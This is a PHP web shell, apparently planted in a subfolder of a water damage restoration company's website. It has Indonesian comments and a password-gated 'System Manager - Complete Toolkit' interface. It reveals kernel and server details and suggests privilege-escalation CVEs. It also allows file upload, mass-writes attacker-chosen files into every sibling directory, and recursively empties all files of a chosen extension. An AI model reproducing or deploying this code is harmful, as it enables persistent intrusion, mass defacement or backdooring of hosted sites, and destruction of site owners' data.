/home/fresvfqn/24hourwaterdamagerestorationlongisland.com/bajk/tesy.php
<?php
session_start();
error_reporting(E_ALL);
ini_set('display_errors', 1);
// ===== KONFIGURASI LOGIN =====
$stored_hash = "da86a3a1b1f29bceeda7b0f68ba90b5d"; // md5("Hadii")
// ===== LOGOUT =====
if (isset($_GET['logout'])) {
session_destroy();
header("Location: " . $_SERVER['PHP_SELF']);
exit;
}
// ===== LOGIN CHECK =====
if (!isset($_SESSION['logged_in']) || $_SESSION['logged_in'] !== true) {
$error = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['login'])) {
$password = $_POST['password'] ?? '';
if (md5($password) === $stored_hash) {
$_SESSION['logged_in'] = true;
header("Location: " . $_SERVER['PHP_SELF']);
exit;
} else {
$error = "Password salah!";
}
}
?>
<!DOCTYPE html>
<html>
<head>
<title>Login</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
}
body {
font-family: Arial;
background: linear-gradient(135deg, #1a2a6c, #b21f1f, #fdbb2d);
text-align:center;
padding-top:100px;
min-height: 100vh;
display: flex;
align-items: center;
justify-content: center;
}
.login-container {
background: rgba(255, 255, 255, 0.95);
padding: 40px;
border-radius: 15px;
box-shadow: 0 15px 30px rgba(0,0,0,0.3);
width: 100%;
max-width: 400px;
}
h2 {
color: #1a2a6c;
margin-bottom: 30px;
font-size: 1.8rem;
}
input[type=password] {
padding: 15px;
width: 100%;
border: 2px solid #e0e0e0;
border-radius: 8px;
font-size: 1rem;
margin-bottom: 20px;
transition: border-color 0.3s;
}
input[type=password]:focus {
border-color: #1a2a6c;
outline: none;
}
input[type=submit] {
padding: 15px 30px;
background: linear-gradient(to right, #1a2a6c, #b21f1f);
color: white;
border: none;
border-radius: 8px;
font-size: 1rem;
font-weight: bold;
cursor: pointer;
transition: all 0.3s;
width: 100%;
}
input[type=submit]:hover {
background: linear-gradient(to right, #b21f1f, #fdbb2d);
transform: translateY(-2px);
}
.error {
color: #b21f1f;
background: #f8d7da;
padding: 10px;
border-radius: 5px;
margin-top: 15px;
border: 1px solid #f5c6cb;
}
</style>
</head>
<body>
<div class="login-container">
<h2>Masukkan Password</h2>
<form method="post">
<input type="hidden" name="login" value="1">
<input type="password" name="password" placeholder="Password" required>
<input type="submit" value="Login">
<?php if (!empty($error)) echo "<div class='error'>$error</div>"; ?>
</form>
</div>
</body>
</html>
<?php
exit;
}
// ===== FUNGSI SISTEM INFORMASI =====
function getSystemInfo() {
$info = [];
// Informasi kernel
$info['kernel'] = php_uname('s') . ' ' . php_uname('r') . ' ' . php_uname('v');
// Alamat IP server
$info['server_ip'] = $_SERVER['SERVER_ADDR'] ?? 'Tidak tersedia';
// Alamat IP client
$info['client_ip'] = $_SERVER['REMOTE_ADDR'] ?? 'Tidak tersedia';
// Path lokasi script
$info['script_path'] = __FILE__;
// Working directory
$info['working_dir'] = getcwd();
// Informasi PHP
$info['php_version'] = phpversion();
// Informasi server
$info['server_software'] = $_SERVER['SERVER_SOFTWARE'] ?? 'Tidak tersedia';
return $info;
}
// ===== FUNGSI VULNERABILITY SCANNER =====
function checkKernelVulnerabilities($kernel) {
$vulnerabilities = [];
// Daftar kernel yang diketahui memiliki kerentanan (contoh)
$vulnerable_kernels = [
'Linux 3.10.0' => 'CVE-2016-5195 (Dirty COW) - Privilege escalation',
'Linux 4.4.0' => 'CVE-2017-16995 - Privilege escalation',
'Linux 4.10.0' => 'CVE-2017-1000112 - Memory corruption',
'Linux 4.14.0' => 'CVE-2018-5333 - Remote code execution',
'Linux 5.0.0' => 'CVE-2019-8912 - Information disclosure',
];
foreach ($vulnerable_kernels as $vuln_kernel => $description) {
if (strpos($kernel, $vuln_kernel) !== false) {
$vulnerabilities[] = [
'kernel' => $vuln_kernel,
'description' => $description,
'severity' => 'Tinggi'
];
}
}
// Jika tidak ditemukan kerentanan spesifik
if (empty($vulnerabilities)) {
$vulnerabilities[] = [
'kernel' => $kernel,
'description' => 'Tidak ditemukan kerentanan yang diketahui dalam database kami',
'severity' => 'Rendah'
];
}
return $vulnerabilities;
}
// ===== FUNGSI UPLOAD FILE =====
function handleFileUpload() {
$uploadResult = [];
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['uploaded_file'])) {
$uploadDir = 'uploads/';
// Buat direktori uploads jika belum ada
if (!is_dir($uploadDir)) {
mkdir($uploadDir, 0755, true);
}
$fileName = basename($_FILES['uploaded_file']['name']);
$filePath = $uploadDir . $fileName;
$fileType = strtolower(pathinfo($filePath, PATHINFO_EXTENSION));
// Validasi file (contoh: hanya izinkan file gambar dan txt)
$allowedTypes = ['jpg', 'jpeg', 'png', 'gif', 'txt', 'pdf'];
if (in_array($fileType, $allowedTypes)) {
if ($_FILES['uploaded_file']['size'] < 5000000) { // Maksimal 5MB
if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $filePath)) {
$uploadResult['success'] = "File " . htmlspecialchars($fileName) . " berhasil diupload.";
$uploadResult['file_path'] = $filePath;
} else {
$uploadResult['error'] = "Terjadi kesalahan saat mengupload file.";
}
} else {
$uploadResult['error'] = "File terlalu besar. Maksimal 5MB.";
}
} else {
$uploadResult['error'] = "Hanya file JPG, JPEG, PNG, GIF, TXT, dan PDF yang diizinkan.";
}
}
return $uploadResult;
}
// ===== PROSES UPLOAD FILE =====
$uploadResult = handleFileUpload();
// ===== FITUR MASS UPLOADER =====
$results = [];
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action'])) {
$action = $_POST['action'];
$basePath = rtrim($_POST['base_path'] ?? '', '/');
if (!is_dir($basePath)) {
$results[] = "<div class='error'>Base path tidak ditemukan: $basePath</div>";
} else {
if ($action === 'create') {
$folderName = trim($_POST['folder_name'] ?? '');
$fileName = trim($_POST['file_name'] ?? '');
$fileContent = $_POST['file_content'] ?? '';
$subfolders = glob($basePath . '/*', GLOB_ONLYDIR);
foreach ($subfolders as $sub) {
$targetFolder = $sub;
if ($folderName) {
$newFolder = $sub . '/' . $folderName;
if (!is_dir($newFolder)) {
if (mkdir($newFolder, 0755)) {
$results[] = "<div class='success'>Folder dibuat: $newFolder</div>";
} else {
$results[] = "<div class='error'>Gagal membuat folder: $newFolder</div>";
}
}
$targetFolder = $newFolder;
}
if ($fileName) {
$filePath = $targetFolder . '/' . $fileName;
// Backup jika file sudah ada
if (file_exists($filePath)) {
$backupPath = $filePath . '.bak';
if (file_exists($backupPath)) {
$backupPath = $filePath . '.' . time() . '.bak';
}
if (rename($filePath, $backupPath)) {
$results[] = "<div class='success'>File lama dipindahkan ke: " . htmlspecialchars($backupPath) . "</div>";
} else {
$results[] = "<div class='error'>Gagal membuat backup: " . htmlspecialchars($filePath) . "</div>";
}
}
// Buat file baru
if (file_put_contents($filePath, $fileContent) !== false) {
$results[] = "<div class='success'>File dibuat: " . htmlspecialchars($filePath) . "</div>";
} else {
$results[] = "<div class='error'>Gagal membuat file: " . htmlspecialchars($filePath) . "</div>";
}
}
}
if (empty($subfolders)) {
$results[] = "<div class='error'>Tidak ada subfolder di $basePath</div>";
}
} elseif ($action === 'scan') {
$ext = trim($_POST['file_ext'] ?? '');
$dateIn = trim($_POST['date_from'] ?? '');
if (!$ext || !$dateIn) {
$results[] = "<div class='error'>Ekstensi dan tanggal wajib diisi!</div>";
} else {
$timestamp = strtotime($dateIn . " 00:00:00");
$foundFiles = [];
$iterator = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($basePath, RecursiveDirectoryIterator::SKIP_DOTS),
RecursiveIteratorIterator::SELF_FIRST
);
foreach ($iterator as $file) {
if ($file->isFile() && strtolower(pathinfo($file, PATHINFO_EXTENSION)) === strtolower($ext)) {
if ($file->getMTime() >= $timestamp) {
$foundFiles[] = $file->getPathname();
}
}
}
if ($foundFiles) {
$results[] = "<div class='success'>Ditemukan " . count($foundFiles) . " file:</div><ul>";
foreach ($foundFiles as $f) {
$results[] = "<li>" . htmlspecialchars($f) . "</li>";
}
$results[] = "</ul>";
$_SESSION['scan_base'] = $basePath;
$_SESSION['scan_ext'] = $ext;
$_SESSION['scan_date'] = $dateIn;
} else {
$results[] = "<div class='error'>Tidak ada file .$ext setelah tanggal $dateIn</div>";
}
}
} elseif ($action === 'blank') {
$basePath = $_SESSION['scan_base'] ?? $basePath;
$ext = $_SESSION['scan_ext'] ?? '';
$dateIn = $_SESSION['scan_date'] ?? '';
$timestamp = strtotime($dateIn . " 00:00:00");
$count = 0;
$iterator = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($basePath, RecursiveDirectoryIterator::SKIP_DOTS),
RecursiveIteratorIterator::SELF_FIRST
);
foreach ($iterator as $file) {
if ($file->isFile() && strtolower(pathinfo($file, PATHINFO_EXTENSION)) === strtolower($ext)) {
if ($file->getMTime() >= $timestamp) {
if (file_put_contents($file->getPathname(), "") !== false) {
$results[] = "<div class='success'>Dikosongkan: ".htmlspecialchars($file->getPathname())."</div>";
$count++;
} else {
$results[] = "<div class='error'>Gagal kosongkan: ".htmlspecialchars($file->getPathname())."</div>";
}
}
}
}
if ($count === 0) {
$results[] = "<div class='error'>Tidak ada file .$ext yang bisa dikosongkan</div>";
}
}
}
}
// ===== DAPATKAN INFORMASI SISTEM =====
$systemInfo = getSystemInfo();
$vulnerabilities = checkKernelVulnerabilities($systemInfo['kernel']);
?>
<!DOCTYPE html>
<html lang="id">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>System Manager - Complete Toolkit</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
}
body {
background: linear-gradient(135deg, #1a2a6c, #b21f1f, #fdbb2d);
color: #333;
min-height: 100vh;
padding: 20px;
}
.container {
max-width: 1400px;
margin: 0 auto;
}
header {
text-align: center;
margin-bottom: 30px;
color: white;
text-shadow: 0 2px 4px rgba(0,0,0,0.3);
position: relative;
}
h1 {
font-size: 2.5rem;
margin-bottom: 10px;
}
.subtitle {
font-size: 1.2rem;
opacity: 0.9;
}
.logout {
position: absolute;
top: 0;
right: 0;
}
.logout a {
padding: 10px 20px;
background: #f44336;
color: white;
text-decoration: none;
border-radius: 5px;
transition: all 0.3s;
}
.logout a:hover {
background: #d32f2f;
transform: translateY(-2px);
}
.card {
background: rgba(255, 255, 255, 0.95);
border-radius: 15px;
padding: 25px;
margin-bottom: 25px;
box-shadow: 0 10px 20px rgba(0,0,0,0.2);
transition: transform 0.3s ease;
}
.card:hover {
transform: translateY(-5px);
}
.card h2 {
color: #1a2a6c;
margin-bottom: 15px;
padding-bottom: 10px;
border-bottom: 2px solid #fdbb2d;
}
.info-grid {
display: grid;
grid-template-columns: repeat(auto-fill, minmax(300px, 1fr));
gap: 15px;
}
.info-item {
background: white;
padding: 15px;
border-radius: 10px;
box-shadow: 0 4px 6px rgba(0,0,0,0.1);
}
.info-label {
font-weight: bold;
color: #1a2a6c;
}
.vulnerability-item {
background: white;
padding: 15px;
border-radius: 10px;
margin-bottom: 10px;
border-left: 5px solid #b21f1f;
}
.severity-high {
border-left-color: #b21f1f;
}
.severity-low {
border-left-color: #28a745;
}
fieldset {
border: 2px solid #1a2a6c;
border-radius: 10px;
padding: 20px;
margin-bottom: 20px;
background: white;
}
legend {
font-weight: bold;
color: #1a2a6c;
padding: 0 10px;
font-size: 1.2rem;
}
input, textarea, select {
width: 100%;
padding: 12px;
margin: 8px 0;
border: 2px solid #e0e0e0;
border-radius: 8px;
font-size: 1rem;
transition: border-color 0.3s;
}
input:focus, textarea:focus, select:focus {
border-color: #1a2a6c;
outline: none;
}
button, .btn {
background: linear-gradient(to right, #1a2a6c, #b21f1f);
color: white;
border: none;
padding: 12px 25px;
border-radius: 8px;
cursor: pointer;
font-size: 1rem;
font-weight: bold;
transition: all 0.3s ease;
text-decoration: none;
display: inline-block;
margin: 5px;
}
button:hover, .btn:hover {
background: linear-gradient(to right, #b21f1f, #fdbb2d);
transform: translateY(-2px);
box-shadow: 0 5px 15px rgba(0,0,0,0.2);
}
.alert {
padding: 15px;
border-radius: 5px;
margin-bottom: 15px;
}
.alert-success {
background-color: #d4edda;
color: #155724;
border: 1px solid #c3e6cb;
}
.alert-error {
background-color: #f8d7da;
color: #721c24;
border: 1px solid #f5c6cb;
}
.success {
color: #28a745;
background: #d4edda;
padding: 10px;
border-radius: 5px;
margin: 5px 0;
border: 1px solid #c3e6cb;
}
.error {
color: #dc3545;
background: #f8d7da;
padding: 10px;
border-radius: 5px;
margin: 5px 0;
border: 1px solid #f5c6cb;
}
.tab-container {
display: flex;
margin-bottom: 20px;
background: white;
border-radius: 10px;
overflow: hidden;
box-shadow: 0 4px 6px rgba(0,0,0,0.1);
}
.tab {
padding: 15px 25px;
background: #f8f9fa;
border: none;
cursor: pointer;
flex: 1;
text-align: center;
font-weight: bold;
transition: all 0.3s;
}
.tab.active {
background: #1a2a6c;
color: white;
}
.tab-content {
display: none;
}
.tab-content.active {
display: block;
}
footer {
text-align: center;
margin-top: 30px;
color: white;
opacity: 0.8;
}
@media (max-width: 768px) {
.info-grid {
grid-template-columns: 1fr;
}
h1 {
font-size: 2rem;
}
.tab-container {
flex-direction: column;
}
}
</style>
</head>
<body>
<div class="container">
<header>
<div class="logout">
<a href="?logout=1">Logout</a>
</div>
<h1>System Manager - Complete Toolkit</h1>
<p class="subtitle">Informasi Sistem, Security Scanner, File Management & Mass Operations</p>
</header>
<!-- Tab Navigation -->
<div class="tab-container">
<button class="tab active" onclick="switchTab('system')">System Info</button>
<button class="tab" onclick="switchTab('security')">Security Scanner</button>
<button class="tab" onclick="switchTab('upload')">File Upload</button>
<button class="tab" onclick="switchTab('mass')">Mass Operations</button>
</div>
<!-- System Info Tab -->
<div id="system" class="tab-content active">
<div class="card">
<h2>Informasi Sistem</h2>
<div class="info-grid">
<div class="info-item">
<div class="info-label">Kernel</div>
<div><?php echo htmlspecialchars($systemInfo['kernel']); ?></div>
</div>
<div class="info-item">
<div class="info-label">IP Server</div>
<div><?php echo htmlspecialchars($systemInfo['server_ip']); ?></div>
</div>
<div class="info-item">
<div class="info-label">IP Client</div>
<div><?php echo htmlspecialchars($systemInfo['client_ip']); ?></div>
</div>
<div class="info-item">
<div class="info-label">Path Script</div>
<div><?php echo htmlspecialchars($systemInfo['script_path']); ?></div>
</div>
<div class="info-item">
<div class="info-label">Working Directory</div>
<div><?php echo htmlspecialchars($systemInfo['working_dir']); ?></div>
</div>
<div class="info-item">
<div class="info-label">Versi PHP</div>
<div><?php echo htmlspecialchars($systemInfo['php_version']); ?></div>
</div>
<div class="info-item">
<div class="info-label">Server Software</div>
<div><?php echo htmlspecialchars($systemInfo['server_software']); ?></div>
</div>
</div>
</div>
</div>
<!-- Security Scanner Tab -->
<div id="security" class="tab-content">
<div class="card">
<h2>Kernel Vulnerability Scanner</h2>
<?php foreach ($vulnerabilities as $vuln): ?>
<div class="vulnerability-item severity-<?php echo strtolower(explode(' ', $vuln['severity'])[0]); ?>">
<div class="info-label">Kernel: <?php echo htmlspecialchars($vuln['kernel']); ?></div>
<div><strong>Deskripsi:</strong> <?php echo htmlspecialchars($vuln['description']); ?></div>
<div><strong>Tingkat Keparahan:</strong> <?php echo htmlspecialchars($vuln['severity']); ?></div>
</div>
<?php endforeach; ?>
<p style="margin-top: 15px; font-style: italic;">
Catatan: Scanner ini hanya untuk tujuan edukasi dan menggunakan database terbatas.
Untuk analisis keamanan yang komprehensif, gunakan alat profesional seperti Nessus, OpenVAS, atau Nikto.
</p>
</div>
</div>
<!-- File Upload Tab -->
<div id="upload" class="tab-content">
<div class="card">
<h2>Upload File</h2>
<?php if (isset($uploadResult['success'])): ?>
<div class="alert alert-success">
<?php echo $uploadResult['success']; ?>
<?php if (isset($uploadResult['file_path'])): ?>
<br>File disimpan di: <?php echo htmlspecialchars($uploadResult['file_path']); ?>
<?php endif; ?>
</div>
<?php elseif (isset($uploadResult['error'])): ?>
<div class="alert alert-error">
<?php echo $uploadResult['error']; ?>
</div>
<?php endif; ?>
<form class="upload-form" action="" method="post" enctype="multipart/form-data">
<div class="form-group">
<label for="uploaded_file">Pilih file untuk diupload (maks. 5MB):</label>
<input type="file" name="uploaded_file" id="uploaded_file" required>
</div>
<button type="submit">Upload File</button>
</form>
<div style="margin-top: 15px;">
<p><strong>File yang diizinkan:</strong> JPG, JPEG, PNG, GIF, TXT, PDF</p>
</div>
</div>
</div>
<!-- Mass Operations Tab -->
<div id="mass" class="tab-content">
<div class="card">
<h2>Mass File Operations</h2>
<fieldset>
<legend><b>Buat Folder & File Baru</b></legend>
<form method="POST">
<input type="hidden" name="action" value="create">
<label>Base Path (contoh: /home/user1)</label>
<input type="text" name="base_path" required value="<?php echo htmlspecialchars($systemInfo['working_dir']); ?>">
<label>Nama Folder Baru (opsional)</label>
<input type="text" name="folder_name">
<label>Nama File (opsional)</label>
<input type="text" name="file_name">
<label>Isi File</label>
<textarea name="file_content" rows="6"></textarea>
<button type="submit">Jalankan</button>
</form>
</fieldset>
<fieldset>
<legend><b>Scan File</b></legend>
<form method="POST">
<input type="hidden" name="action" value="scan">
<label>Base Path (contoh: /home/user1)</label>
<input type="text" name="base_path" required value="<?php echo htmlspecialchars($systemInfo['working_dir']); ?>">
<label>Ekstensi File (contoh: php, html, txt)</label>
<input type="text" name="file_ext" required>
<label>Scan mulai tanggal (format: yyyy-mm-dd)</label>
<input type="date" name="date_from" required>
<button type="submit">Scan File</button>
</form>
</fieldset>
<?php if(isset($_SESSION['scan_base'])): ?>
<fieldset>
<legend><b>Mass Blank File</b></legend>
<form method="POST" id="blankForm">
<input type="hidden" name="action" value="blank">
<button type="submit">Kosongkan Semua File Ini</button>
</form>
<script>
document.getElementById('blankForm').onsubmit = function() {
return confirm("Apakah Anda yakin ingin mengosongkan file ini?\nTindakan ini tidak bisa di-undo.");
};
</script>
</fieldset>
<?php endif; ?>
<!-- Results Display -->
<?php if (!empty($results)): ?>
<fieldset>
<legend><b>Hasil Operasi</b></legend>
<div>
<?php foreach ($results as $r) { echo $r . "<br>"; } ?>
</div>
</fieldset>
<?php endif; ?>
</div>
</div>
<footer>
<p>System Manager - Complete Toolkit © <?php echo date('Y'); ?></p>
</footer>
</div>
<script>
function switchTab(tabName) {
// Hide all tab contents
document.querySelectorAll('.tab-content').forEach(tab => {
tab.classList.remove('active');
});
// Remove active class from all tabs
document.querySelectorAll('.tab').forEach(tab => {
tab.classList.remove('active');
});
// Show selected tab content
document.getElementById(tabName).classList.add('active');
// Add active class to clicked tab
event.currentTarget.classList.add('active');
}
</script>
</body>
</html>